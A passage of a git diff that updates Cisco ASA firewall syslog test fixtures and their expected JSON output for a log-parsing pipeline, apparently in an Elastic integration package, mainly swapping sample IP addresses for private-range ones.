3428 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index 40735d586d3..7c4b90f46d0 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -10,8 +10,8 @@ }, "destination": { "port": 8256, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1772, @@ -51,7 +51,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -59,8 +59,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721191900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256", + "ingested": "2021-12-09T13:34:28.099034Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -93,8 +93,8 @@ }, "source": { "port": 80, - "address": "100.66.205.104", - "ip": "100.66.205.104" + "address": "192.168.205.104", + "ip": "192.168.205.104" }, "tags": [ "preserve_original_event" @@ -129,7 +129,7 @@ 